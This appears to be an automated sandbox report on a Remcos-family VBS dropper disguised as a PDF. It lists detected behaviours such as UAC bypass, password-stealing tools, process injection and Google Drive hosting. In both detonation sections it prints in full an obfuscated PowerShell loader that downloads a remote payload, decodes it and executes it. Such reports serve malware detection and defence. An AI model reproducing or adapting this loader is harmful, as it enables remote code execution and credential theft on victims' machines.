Analysis Overview
SHA256
2bd56ceb64c1a9af7909370d31a3bfd6bb3debcfbb674491cc081b4a7088832a
Threat Level: Known bad
The file 074c592b-5cc0-496d-b3fa-45a09d4363ce·pdf.vbs was found to be: Known bad.
Malicious Activity Summary
Remcos family
Remcos
UAC bypass
NirSoft MailPassView
NirSoft WebBrowserPassView
Detected Nirsoft tools
Uses browser remote debugging
Blocklisted process makes network request
Checks computer location settings
Accesses Microsoft Outlook accounts
Legitimate hosting services abused for malware hosting/C2
Command and Scripting Interpreter: PowerShell
Suspicious use of SetThreadContext
Suspicious use of NtCreateThreadExHideFromDebugger
Suspicious use of NtSetInformationThreadHideFromDebugger
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of AdjustPrivilegeToken
Modifies registry class
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Modifies registry key
Suspicious use of FindShellTrayWindow
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-11 09:02
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-11 09:02
Reported
2024-11-11 09:04
Platform
win7-20241010-en
Max time kernel
119s
Max time network
124s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2320 wrote to memory of 2724 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2320 wrote to memory of 2724 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2320 wrote to memory of 2724 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\074c592b-5cc0-496d-b3fa-45a09d4363ce·pdf.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nonargumentatively Dendrocoela Coalmonger Doorway Foranstaltningerne Socialcentret #><#Kiddushin Christins Isoantigen Pangas Timucua Uniformising servicekonceptets #>$polypian='Berytidae';function Mandages($Bellwether){If ($host.DebuggerEnabled) {$Balkily++;$Formummede=$Bellwether.'Length' - $Balkily} for ( $Hurraet=4;$Hurraet -lt $Formummede;$Hurraet+=5){$Alejandro=$Hurraet;$Buhkoen+=$Bellwether[$Hurraet]}$Buhkoen}function Tervariant($Replanter){ .($Socialhjlpsmodtagere) ($Replanter)}$Nringsmaterialerne=Mandages ' AskNStvlEEv cTSved.BlksWMas EUnnaBUndec alsl ReviVasoeOldnnForlTCrin ';$Hurraetngrainedness=Mandages 'Lft,MSl goFirez B oiEd.elUdmrlMagtaLunc/Mag ';$Acidulousness=Mandages ' Fi Ta.tilEsths aml1Sven2Zebi ';$Stevedoringerne='Rain[Fem.NBetaeMiniTn rm.SejlSEntre ProR T,mVBeami K ncDidaE opdP Beeo P uiHjb.nLap,tJunimmisoaAny,NRel,Apl tgKab.esygeROpre] A.r:N.na:Bl aSGyltEMucoCMan uhjesRInv I Pyot,tevYKaraPEc tR IleOBesut ravO GascS bsoAci lTeks=Nava$ TumaAngic ori SelDN ncU alolKommOFor,u legsdeacN UndEStemSAb as Vel ';$Hurraetngrainedness+=Mandages 'Mam 5Ove .A el0L.nk An a(Su.eWSetoiFabrnHomodKingoOmgrwE apsDans cleiNT ioTSort Aars1Khes0lvsp. obj0 ise;Sc e NonoWBrndiU ben Skr6Trfo4Stam;rase T naxVare6Avan4Con,;Unde OmkorBegrvPolo:Ejst1Task3Vol 1Fant. usk0Virk)Idle SamG kjaeFjarcbrank ostoFolk/Afsk2.orb0Sne 1 Cur0Wast0,rut1 am0Inte1Out Sa.sFElasiBortrL ste llfUnhooFlytxSkra/ b.t1 S.l3Prev1 et.Seti0Lobb ';$Rundrejserne=Mandages 'ProguF.rbsAfvaEMaanr S n-J spa AkaGAun eflodn S.etAphe ';$Skanke=Mandages 'Diath Dr t FeltSvmmpDeflsScu.:.eci/ Gus/Pr tdSuccrHeksiMis.vPothe .ac.Uncag iloRaceoRoekgRectlBidseSemi.Romac S.eo.ealm pos/RednuIllecA.th? 
skeeEnwoxK ckpTacioStifrStbetNonp=Prstd RegoTretw M nnBed,ldidaodal abijedBis &PinniE ecd ,in=Konj1Esp OPla m.epiV TrfE inQ.bilTPraezImmeE NonFMic USpud0UpmoCMarcm Tr PDo.nxVa sErecrdLynlID.sbDGru TKo sM PetBBystK moozS,ntKBill0 SkaLspndvLoveQTranC E,rDEpicxFart ';$Blyantsstiftens=Mandages 'I du>N nb ';$Socialhjlpsmodtagere=Mandages ' LaniStanELangXR gs ';$Resetter='biografiskes';$Leadout='\Overballast.Van';Tervariant (Mandages 'Dift$ HypgAnsvLBrneoIndbbBrugAB dsl P r: Anot,avnI InslEfteGFo.koSkold.once u.pS HysKMagaRCircIIntiVfstne Hux=buga$PseuE desnoutbVRead: gr ACiviP c,rpForudCiviaMo.ltForeA.ret+Gast$ VallVandeja iAB red,nbooNoneUEditTSubl ');Tervariant (Mandages 'Valg$ ,lkgBuddLFldno KryBPebaAA kol ,dk:Ca cAEksplLedelnineO S uPNattLDosmA WorsSr mMplne=Gorm$ verS Tork Du ARenoNUnc.K audeSa p. DynsMe aPApotL holIUndeTBar,(Reta$ Ti bFarrl ProYNaamADataN ForT AfssPreesDataT redI.ollFSuccTGasbeMegunK.ypsUnde) Amb ');Tervariant (Mandages $Stevedoringerne);$Skanke=$Alloplasm[0];$Bagstavnenes=(Mandages 'Demo$FritgVil,lA stOSemibPleuAFli l ol: ExclFumeE dapRSlavs ,ent ConAStraMFejlpIntreTon Tc.mu=Hav,nAtt ePrerW,eet-SkanoKogebHithJUnese isocSamatS,mi MahoSAutoYFumeSMervTdoc edatamVen .prot$.ompNWa tr VagiBilanvareGPs,mS abnMTiptANoncTKasseSalarTusii Acoa B wLAktiEResyr AffNTremE Rea ');Tervariant ($Bagstavnenes);Tervariant (Mandages 'Auto$TrstLSteme ThrrA,ies H.etKo oaSaldmA,stpnerve b,nt Unb.BowsHTraceAc ra N,gdDe,ieBogmrTernsNonc[ ve$ thuR stouS,ernSc nd umlr SyneUn ej IntsDekoeMilirMenin ArieErhv]Side=eder$Af iHKreeuMffer Manr ysia EnteAse tSnown trkgVar,rJorda rli F enDannePopud SolnFonteDys.sI,pes alg ');$bolines=Mandages 'Udb $SpreLRe.pebettrKultsSpgetp,ikaTsarmO.etpAldeeCatctVand.A baD .unoGen wE.isn illBouvoCir.a,ebgd Et FNemaiLownl TvaeDaab( F r$SydvSD.alk Stia arbnR,gikUdrieFelt, Bet$ fejFPintdSkoleLrt.nSam dSt neR adsRetn)rdse ';$Fdendes=$Tilgodeskrive;Tervariant (Mandages 'Chri$FoldGSa,oLWel OGeogB MilaPa iLJaco: TurlThr,A G nZ P,vuModeRProciC,mutTripEE 
cusFlle=Prin(Si,nTJur,EUtroSBlomTBun -iconp OveaKonfTProsHUrta ign$EpitFDyrpD TruePropNOstaDUn.oethorSA.pe)Opd ');while (!$lazurites) {Tervariant (Mandages 'Gaas$ Me,gAerelGrunoInteb Lsea ItclFagu: NilMT rvaSv,ncBiogr AfsawrinnCurld.ruer nteetwit=.ppe$GrahtTilrrUnbeu,riveIlio ') ;Tervariant $bolines;Tervariant (Mandages ' KalS ealtUa baSkn R Chat Ka -K ppsNanoLWos,ewebfeDaarpS ak Belu4,nke ');Tervariant (Mandages 'Attr$GravgSdcelHempOU,reBknorACrosLMa,s:Pseul Kama MisZG.tgUFal rSti IHulkt Bloe krisNonr=Non.(TrumTha,leGo,eSE nstMe l-p trP ashaFinatbankHAfst .ain$ Damf erDStavEko rnAutod M,kEIntes .vi)Inte ') ;Tervariant (Mandages 'Belg$MentGStralUr tOUn obSpisAUnifL Pro:DecicAllohScanlNo,sOSandrPer oDy,gpBusfH DomytetrcAkryehofmA TrieV.lm= Bet$ P.tgsamtLBud.oStraB eaga UnbL Tau:KirkGDissaSesqLBezzlMundESk,kO ainNFis,sNeis+Civi+Rupi%afv.$ManfAGlidLBovoL Ta ODiv.pBrstLD.taAGastsalkaMSeal.Helmc FyroUnviUPlouNNvnsTPrec ') ;$Skanke=$Alloplasm[$Chlorophyceae]}$Maze=301481;$Ruskninger=28816;Tervariant (Mandages 'Samf$ KakGOpfilTjuro Oe.BUnprAGashlR,ya:Farts oildRoi ERummSHeksTRoteONu,pfAnlifFeltePaleRTeleNJaileArboSKilo W is=Mdea Fo,GForhEsprdt Fr -In uCPartoS rmnTofrTOveremu,aNO lyTPr t Udbu$TamsfPlatD StrEPo.cNHodeDTa vE ScaSHere ');Tervariant (Mandages 'Non $Mag g G.ml.rmio rfrbSmagaMiljl Aff: .ubCLithoAktil uaroBebynUnspiVildsSubjaF eebPengistrel,kspiPlebtFl eiWinde IndsTumi Udhn= Udt dalf[TyfuSSttey Suss UnstOdeleT,scmQu.m.Ze,oCTi goRevinOddfvAsoce UtmrEn et Tv.] Mil: Ant:VandFGlimrBov.o,iccmSamfBReckaDoucs preeF jl6Oxid4SubcS F et MarrP.oviMin.nLodsgVolu( Ove$GraiS.lerdFeede evs fdt FruoRe afTrbufSti,eScorrGastnTerneVogtsPoli) ,ip ');Tervariant (Mandages 'Ud.v$CateGBlidLT rvoSootBS.maA lyvlMiss:MaftSR fot,fskIFr,kNFlamgIridF ubsI mfusPochh MaxEi,disDing Balt=Aban Dest[ Re.s oreYP rlSIliutBo.iET,moMTita.CmdrTshepeFnikXTitrtHusb. 
beceMariNFortcUdnaO k mD ngeiDekanA,tiGLull] ,ty:Laan: .ncALetnS CovC TiliGy eILucr.WeekgUndie luft tops Fa TGasrrCoppi prnForug acu(a tf$Per.cTangosemiLStenODresn Be,iUncrsPookAWhorbag,lI TreLTa eiPr,ktUre IShage LarSe th)In x ');Tervariant (Mandages '.can$CorwgIndelFngsO.eriBRi jaIldsLresy:BevrVpip EGenaNValgeSammkClerL SluaFrucPAss =Delt$ LevS orbTRecei.rianPelogD xtfArk I SkdsBad.HKok,eKrftSOutg.EkspsConcuEc ib T os BastRetrR .ubI LibNSt mGProg(Ranc$PerlMToteaRynkZ H aeVres, Spr$.oleRP.nju Ganspreak iftNDidliOutmnCrengenthe SurRAar ) .rd ');Tervariant $Veneklap;"
Network
Files
C:\Users\Admin\AppData\Local\Temp\CabE562.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-11 09:02
Reported
2024-11-11 09:04
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
Remcos
Remcos family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Accesses Microsoft Outlook accounts
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts | C:\Windows\SysWOW64\msiexec.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2400 set thread context of 2424 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 2400 set thread context of 4448 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 2400 set thread context of 3764 | N/A | C:\Windows\SysWOW64\msiexec.exe | C:\Windows\SysWOW64\msiexec.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\Chrome.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\074c592b-5cc0-496d-b3fa-45a09d4363ce·pdf.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#nonargumentatively Dendrocoela Coalmonger Doorway Foranstaltningerne Socialcentret #><#Kiddushin Christins Isoantigen Pangas Timucua Uniformising servicekonceptets #>$polypian='Berytidae';function Mandages($Bellwether){If ($host.DebuggerEnabled) {$Balkily++;$Formummede=$Bellwether.'Length' - $Balkily} for ( $Hurraet=4;$Hurraet -lt $Formummede;$Hurraet+=5){$Alejandro=$Hurraet;$Buhkoen+=$Bellwether[$Hurraet]}$Buhkoen}function Tervariant($Replanter){ .($Socialhjlpsmodtagere) ($Replanter)}$Nringsmaterialerne=Mandages ' AskNStvlEEv cTSved.BlksWMas EUnnaBUndec alsl ReviVasoeOldnnForlTCrin ';$Hurraetngrainedness=Mandages 'Lft,MSl goFirez B oiEd.elUdmrlMagtaLunc/Mag ';$Acidulousness=Mandages ' Fi Ta.tilEsths aml1Sven2Zebi ';$Stevedoringerne='Rain[Fem.NBetaeMiniTn rm.SejlSEntre ProR T,mVBeami K ncDidaE opdP Beeo P uiHjb.nLap,tJunimmisoaAny,NRel,Apl tgKab.esygeROpre] A.r:N.na:Bl aSGyltEMucoCMan uhjesRInv I Pyot,tevYKaraPEc tR IleOBesut ravO GascS bsoAci lTeks=Nava$ TumaAngic ori SelDN ncU alolKommOFor,u legsdeacN UndEStemSAb as Vel ';$Hurraetngrainedness+=Mandages 'Mam 5Ove .A el0L.nk An a(Su.eWSetoiFabrnHomodKingoOmgrwE apsDans cleiNT ioTSort Aars1Khes0lvsp. obj0 ise;Sc e NonoWBrndiU ben Skr6Trfo4Stam;rase T naxVare6Avan4Con,;Unde OmkorBegrvPolo:Ejst1Task3Vol 1Fant. usk0Virk)Idle SamG kjaeFjarcbrank ostoFolk/Afsk2.orb0Sne 1 Cur0Wast0,rut1 am0Inte1Out Sa.sFElasiBortrL ste llfUnhooFlytxSkra/ b.t1 S.l3Prev1 et.Seti0Lobb ';$Rundrejserne=Mandages 'ProguF.rbsAfvaEMaanr S n-J spa AkaGAun eflodn S.etAphe ';$Skanke=Mandages 'Diath Dr t FeltSvmmpDeflsScu.:.eci/ Gus/Pr tdSuccrHeksiMis.vPothe .ac.Uncag iloRaceoRoekgRectlBidseSemi.Romac S.eo.ealm pos/RednuIllecA.th? 
skeeEnwoxK ckpTacioStifrStbetNonp=Prstd RegoTretw M nnBed,ldidaodal abijedBis &PinniE ecd ,in=Konj1Esp OPla m.epiV TrfE inQ.bilTPraezImmeE NonFMic USpud0UpmoCMarcm Tr PDo.nxVa sErecrdLynlID.sbDGru TKo sM PetBBystK moozS,ntKBill0 SkaLspndvLoveQTranC E,rDEpicxFart ';$Blyantsstiftens=Mandages 'I du>N nb ';$Socialhjlpsmodtagere=Mandages ' LaniStanELangXR gs ';$Resetter='biografiskes';$Leadout='\Overballast.Van';Tervariant (Mandages 'Dift$ HypgAnsvLBrneoIndbbBrugAB dsl P r: Anot,avnI InslEfteGFo.koSkold.once u.pS HysKMagaRCircIIntiVfstne Hux=buga$PseuE desnoutbVRead: gr ACiviP c,rpForudCiviaMo.ltForeA.ret+Gast$ VallVandeja iAB red,nbooNoneUEditTSubl ');Tervariant (Mandages 'Valg$ ,lkgBuddLFldno KryBPebaAA kol ,dk:Ca cAEksplLedelnineO S uPNattLDosmA WorsSr mMplne=Gorm$ verS Tork Du ARenoNUnc.K audeSa p. DynsMe aPApotL holIUndeTBar,(Reta$ Ti bFarrl ProYNaamADataN ForT AfssPreesDataT redI.ollFSuccTGasbeMegunK.ypsUnde) Amb ');Tervariant (Mandages $Stevedoringerne);$Skanke=$Alloplasm[0];$Bagstavnenes=(Mandages 'Demo$FritgVil,lA stOSemibPleuAFli l ol: ExclFumeE dapRSlavs ,ent ConAStraMFejlpIntreTon Tc.mu=Hav,nAtt ePrerW,eet-SkanoKogebHithJUnese isocSamatS,mi MahoSAutoYFumeSMervTdoc edatamVen .prot$.ompNWa tr VagiBilanvareGPs,mS abnMTiptANoncTKasseSalarTusii Acoa B wLAktiEResyr AffNTremE Rea ');Tervariant ($Bagstavnenes);Tervariant (Mandages 'Auto$TrstLSteme ThrrA,ies H.etKo oaSaldmA,stpnerve b,nt Unb.BowsHTraceAc ra N,gdDe,ieBogmrTernsNonc[ ve$ thuR stouS,ernSc nd umlr SyneUn ej IntsDekoeMilirMenin ArieErhv]Side=eder$Af iHKreeuMffer Manr ysia EnteAse tSnown trkgVar,rJorda rli F enDannePopud SolnFonteDys.sI,pes alg ');$bolines=Mandages 'Udb $SpreLRe.pebettrKultsSpgetp,ikaTsarmO.etpAldeeCatctVand.A baD .unoGen wE.isn illBouvoCir.a,ebgd Et FNemaiLownl TvaeDaab( F r$SydvSD.alk Stia arbnR,gikUdrieFelt, Bet$ fejFPintdSkoleLrt.nSam dSt neR adsRetn)rdse ';$Fdendes=$Tilgodeskrive;Tervariant (Mandages 'Chri$FoldGSa,oLWel OGeogB MilaPa iLJaco: TurlThr,A G nZ P,vuModeRProciC,mutTripEE 
cusFlle=Prin(Si,nTJur,EUtroSBlomTBun -iconp OveaKonfTProsHUrta ign$EpitFDyrpD TruePropNOstaDUn.oethorSA.pe)Opd ');while (!$lazurites) {Tervariant (Mandages 'Gaas$ Me,gAerelGrunoInteb Lsea ItclFagu: NilMT rvaSv,ncBiogr AfsawrinnCurld.ruer nteetwit=.ppe$GrahtTilrrUnbeu,riveIlio ') ;Tervariant $bolines;Tervariant (Mandages ' KalS ealtUa baSkn R Chat Ka -K ppsNanoLWos,ewebfeDaarpS ak Belu4,nke ');Tervariant (Mandages 'Attr$GravgSdcelHempOU,reBknorACrosLMa,s:Pseul Kama MisZG.tgUFal rSti IHulkt Bloe krisNonr=Non.(TrumTha,leGo,eSE nstMe l-p trP ashaFinatbankHAfst .ain$ Damf erDStavEko rnAutod M,kEIntes .vi)Inte ') ;Tervariant (Mandages 'Belg$MentGStralUr tOUn obSpisAUnifL Pro:DecicAllohScanlNo,sOSandrPer oDy,gpBusfH DomytetrcAkryehofmA TrieV.lm= Bet$ P.tgsamtLBud.oStraB eaga UnbL Tau:KirkGDissaSesqLBezzlMundESk,kO ainNFis,sNeis+Civi+Rupi%afv.$ManfAGlidLBovoL Ta ODiv.pBrstLD.taAGastsalkaMSeal.Helmc FyroUnviUPlouNNvnsTPrec ') ;$Skanke=$Alloplasm[$Chlorophyceae]}$Maze=301481;$Ruskninger=28816;Tervariant (Mandages 'Samf$ KakGOpfilTjuro Oe.BUnprAGashlR,ya:Farts oildRoi ERummSHeksTRoteONu,pfAnlifFeltePaleRTeleNJaileArboSKilo W is=Mdea Fo,GForhEsprdt Fr -In uCPartoS rmnTofrTOveremu,aNO lyTPr t Udbu$TamsfPlatD StrEPo.cNHodeDTa vE ScaSHere ');Tervariant (Mandages 'Non $Mag g G.ml.rmio rfrbSmagaMiljl Aff: .ubCLithoAktil uaroBebynUnspiVildsSubjaF eebPengistrel,kspiPlebtFl eiWinde IndsTumi Udhn= Udt dalf[TyfuSSttey Suss UnstOdeleT,scmQu.m.Ze,oCTi goRevinOddfvAsoce UtmrEn et Tv.] Mil: Ant:VandFGlimrBov.o,iccmSamfBReckaDoucs preeF jl6Oxid4SubcS F et MarrP.oviMin.nLodsgVolu( Ove$GraiS.lerdFeede evs fdt FruoRe afTrbufSti,eScorrGastnTerneVogtsPoli) ,ip ');Tervariant (Mandages 'Ud.v$CateGBlidLT rvoSootBS.maA lyvlMiss:MaftSR fot,fskIFr,kNFlamgIridF ubsI mfusPochh MaxEi,disDing Balt=Aban Dest[ Re.s oreYP rlSIliutBo.iET,moMTita.CmdrTshepeFnikXTitrtHusb. 
beceMariNFortcUdnaO k mD ngeiDekanA,tiGLull] ,ty:Laan: .ncALetnS CovC TiliGy eILucr.WeekgUndie luft tops Fa TGasrrCoppi prnForug acu(a tf$Per.cTangosemiLStenODresn Be,iUncrsPookAWhorbag,lI TreLTa eiPr,ktUre IShage LarSe th)In x ');Tervariant (Mandages '.can$CorwgIndelFngsO.eriBRi jaIldsLresy:BevrVpip EGenaNValgeSammkClerL SluaFrucPAss =Delt$ LevS orbTRecei.rianPelogD xtfArk I SkdsBad.HKok,eKrftSOutg.EkspsConcuEc ib T os BastRetrR .ubI LibNSt mGProg(Ranc$PerlMToteaRynkZ H aeVres, Spr$.oleRP.nju Ganspreak iftNDidliOutmnCrengenthe SurRAar ) .rd ');Tervariant $Veneklap;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
